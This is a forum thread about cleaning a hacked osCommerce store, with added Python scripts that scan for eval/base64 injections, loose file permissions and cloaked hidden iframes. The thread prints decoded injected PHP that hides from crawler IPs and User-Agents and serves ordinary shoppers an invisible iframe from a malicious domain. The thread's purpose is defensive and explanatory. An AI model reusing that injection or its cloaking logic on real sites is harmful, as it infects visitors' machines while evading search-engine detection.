
osCommerce


Might have been hacked, need help with Warning: session_start() message


vwnobby


Unfortunately I know very little about osCommerce and how it works. The site I'm "managing" was dumped onto my lap and I was mainly tasked with design upkeep. However, the customer contacted me and said that messages were appearing at the top of the site. This is what is showing:

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/F/4/E/F4Everyone/html/index.php(1) : eval()'d code:37) in /home/content/F/4/E/F4Everyone/html/includes/functions/sessions.php on line 97

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/content/F/4/E/F4Everyone/html/index.php(1) : eval()'d code:37) in /home/content/F/4/E/F4Everyone/html/includes/functions/sessions.php on line 97

Warning: I am able to write to the configuration file: /home/content/F/4/E/F4Everyone/html/includes/configure.php. This is a potential security risk - please set the right user permissions on this file.

I've been searching online for several hours now and the only thing I've managed to find out is that the site may have been hacked.

Can anyone give me some direction to get rid of the messages for now, and how I can go about preventing it from happening once more?

Again, I am very unfamiliar with how osCommerce (and PHP/MySQL as well) works, so I may require a lot of hand holding.

Any help would be greatly appreciated!!!

Thank you!


Yes, you've been hacked. At the very top of your index.php you'll find some foreign code, probably containing an eval() call. Remove it, and that unfortunately is just the start of disinfecting your site. Also read up on beefing up your site's security, to reduce the chances of a hacker getting in again.

Both "configure.php" files are supposed to be read-only (444 permissions). How long have they been writable?


Follow these steps to clean and secure your website:

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hacker's code.

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64', 'eval', 'decode'.

3) Delete the files on your hosting account before uploading the clean files.

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads: Admin Security and Website Security.

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE.

6) Make sure file and directory permissions are set correctly: directories no higher than 755, files no higher than 644 and the TWO configure.php files no higher than 444.

7) If your site has been 'blacklisted' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified, to be removed from the 'blacklist'.

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

10) If you feel you cannot perform any of the above steps, you should seek professional help to ensure all malware is removed.

Chris



Thanks for the info MrPhil! I was able to remove the messages for now, but I do understand that it's probably only the beginning of the issues. As for how long we were writable, I honestly don't know. The client has not contacted me for work for almost a year. So I haven't touched the site for quite some time. However, I believe the messages only appeared recently, probably within the last few days.


Chris, thanks for the list!!! It'll give me somewhat of a road map to follow during this process.

I have questions on items 1 & 8.

Not really sure how .htaccess works. I did find a site that generates code for this file (http://www.oscommerce-solution.com/create_htpasswd.php).

Is it as simple as adding a small block of code? I've seen several .htaccess files throughout the different file folders; do they all get modified? Once I add the password, is it just the admin directory that will require a password, or will it block users from the site? (And is this why you mentioned having to remove the .htaccess later on?)

Sorry for so many questions, just trying to get a grip on how this works.

Thanks again for the info!!!


So I tried to do some cleaning up, but since I'm not that well versed, I guess I didn't do a good enough job. The same issue keeps coming up.

I had a friend "decode" the eval statement that showed up at the top of the index.php file and this is what he found:

error_reporting(0);   // silence PHP errors so the injection does not draw attention

$bot = FALSE;

// User-Agent fragments taken to mean "crawler or scanner, not a real browser"
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');

// Address ranges (first, last) the injection treats as crawler infrastructure
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    array("64.68.80.0" ,"64.68.87.255" ),
    array("66.102.0.0", "66.102.15.255"),
    array("64.233.160.0","64.233.191.255"),
    array("66.249.64.0", "66.249.95.255"),
    array("72.14.192.0", "72.14.255.255"),
    array("209.85.128.0","209.85.255.255"),
    array("198.108.100.192","198.108.100.207"),
    array("173.194.0.0","173.194.255.255"),
    array("216.33.229.144","216.33.229.151"),
    array("216.33.229.160","216.33.229.167"),
    array("209.185.108.128","209.185.108.255"),
    array("216.109.75.80","216.109.75.95"),
    array("64.68.88.0","64.68.95.255"),
    array("64.68.64.64","64.68.64.127"),
    array("64.41.221.192","64.41.221.207"),
    array("74.125.0.0","74.125.255.255"),
    array("65.52.0.0","65.55.255.255"),
    array("74.6.0.0","74.6.255.255"),
    array("67.195.0.0","67.195.255.255"),
    array("72.30.0.0","72.30.255.255"),
    array("38.0.0.0","38.255.255.255")
);

// Visitor address as an unsigned integer, so the ranges can be compared numerically
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));

// A visitor inside any listed range is treated as a bot
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}

// So is a visitor whose User-Agent contains any of the fragments above
foreach ($user_agent_to_filter as $bot_sign){
    if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}

// Everyone else (ordinary shoppers) gets an invisible 1x1 iframe. This echo runs before
// osCommerce calls session_start(), which is what produces the "headers already sent" warnings.
if (!$bot) {
    echo '<iframe src="http://alzvcmr.co.tv/?go=1" width="1" height="1"></iframe>';
}

Anyone have any ideas what to do with this?

When looking through the code, is there any reason why base64 should be on any page? Or should I just remove any reference to base64?


There are a couple of files contained in osCommerce and some contributions that contain the base64 decode function. However, there is NO encrypted code found in ANY file in osCommerce.

Chris
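Steps 2 and 6 of Chris's cleanup list, together with his point just above that stock osCommerce calls base64_decode() legitimately but never carries encoded blobs, as an added Python example that is not from the thread: it walks a downloaded copy of the site tree, flags only PHP files where eval() consumes base64_decode() output or where a line holds a long base64-looking literal (the 200-character threshold is my assumption), and reports every entry above the 755/644/444 permission ceilings. It assumes a Linux or macOS filesystem, since Windows does not carry Unix mode bits.

```python
import os
import re
import stat

# The injected pattern from this thread: eval() fed by base64_decode(). A bare
# base64_decode() call is NOT matched; stock osCommerce uses it legitimately.
INJECTED = re.compile(r"eval\s*\(.*base64_decode\s*\(")
# Assumed heuristic (not an osCommerce rule): a 200+ char base64-looking literal
# on a single line is the kind of encoded blob stock files never carry.
LONG_BLOB = re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")
# Permission ceilings from step 6 of the cleanup list (Unix mode bits assumed).
DIR_MAX, FILE_MAX, CONFIG_MAX = 0o755, 0o644, 0o444

def scan_php(text):
    """Return the reasons a PHP source looks injected (empty list = clean)."""
    reasons = []
    for n, line in enumerate(text.splitlines(), 1):
        if INJECTED.search(line):
            reasons.append("line %d: eval() of base64_decode() output" % n)
        elif LONG_BLOB.search(line):
            reasons.append("line %d: long base64-looking literal" % n)
    return reasons

def loose_perms(root):
    """Return (path, octal mode) for entries with any bit above their ceiling."""
    entries = [(root, DIR_MAX)]
    for dirpath, dirnames, filenames in os.walk(root):
        entries += [(os.path.join(dirpath, d), DIR_MAX) for d in dirnames]
        entries += [(os.path.join(dirpath, f),
                     CONFIG_MAX if f == "configure.php" else FILE_MAX)
                    for f in filenames]
    bad = []
    for path, limit in entries:
        mode = stat.S_IMODE(os.lstat(path).st_mode)
        if mode & ~limit:  # a bit is set that the ceiling does not allow
            bad.append((path, oct(mode)))
    return bad

def sweep(root):
    """Run both checks over a downloaded copy of the site tree."""
    findings = {"injected": {}, "perms": loose_perms(root)}
    for dirpath, _, filenames in os.walk(root):
        for name in (n for n in filenames if n.endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                reasons = scan_php(fh.read())
            if reasons:
                findings["injected"][path] = reasons
    return findings
```

Run `sweep("/path/to/downloaded/site")` on the copy you FTP'd down; a flagged file needs manual review, and an empty "perms" list means step 6 is already satisfied.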



The code checks the IP address of whoever is viewing it against the IP addresses of some known BOTS.

If the viewer ISN'T one of the BOTs, it "contaminates" the page.

This way they (the hackers) don't end up with a "This site may harm your computer" message on search engine results of sites they infect.

This generally allows them to infect more machines.

If I suggest you edit any file(s), make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."
- Me -

"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
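The cloaking described above, as an added Python example that is not from the thread: one function finds iframes a visitor could never see (1x1 or hidden by style), and another fetches the same page with a browser User-Agent and a crawler User-Agent and reports whether the two views disagree, which is exactly what the decoded snippet produces. The fetcher is passed in so the demo runs offline; the two User-Agent strings, the sample HTML and the iframe host are constructed, not taken from the thread.

```python
from html.parser import HTMLParser

class HiddenIframeFinder(HTMLParser):
    """Collect the src of every iframe that a visitor could not see."""
    def __init__(self):
        super().__init__()
        self.hits = []
    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        if (tiny(a.get("width")) or tiny(a.get("height"))
                or "display:none" in style or "visibility:hidden" in style):
            self.hits.append(a.get("src", ""))

def tiny(value):
    """True for a width/height attribute of 1px or less (the 1x1 trick)."""
    try:
        return int(str(value).rstrip("px")) <= 1
    except ValueError:
        return False

def hidden_iframes(html):
    parser = HiddenIframeFinder()
    parser.feed(html)
    return parser.hits

# Assumed User-Agent strings: one ordinary browser, one crawler. The decoded
# snippet looks for 'bot' inside the UA string, so the crawler one trips it.
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"
CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1)"

def cloaking_report(fetch):
    """fetch(user_agent) -> HTML; cloaked payloads reach only non-crawler visitors."""
    browser = hidden_iframes(fetch(BROWSER_UA))
    crawler = hidden_iframes(fetch(CRAWLER_UA))
    return {"browser_sees": browser, "crawler_sees": crawler,
            "cloaked": browser != crawler}

# Constructed sample responses standing in for a live site; the iframe host is a
# placeholder, not the domain from the thread.
CLEAN_PAGE = "<html><body><h1>Shop</h1></body></html>"
INFECTED_PAGE = ('<html><body><iframe src="http://injected.example/?go=1" '
                 'width="1" height="1"></iframe><h1>Shop</h1></body></html>')

def fake_fetch(user_agent):
    """Mimics the decoded snippet: bots get the clean page, everyone else the iframe."""
    return CLEAN_PAGE if "bot" in user_agent else INFECTED_PAGE
```

Against a live site, replace fake_fetch with a function that issues an HTTP GET carrying the given User-Agent header; a "cloaked": True result is the signature of the behaviour this thread describes.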
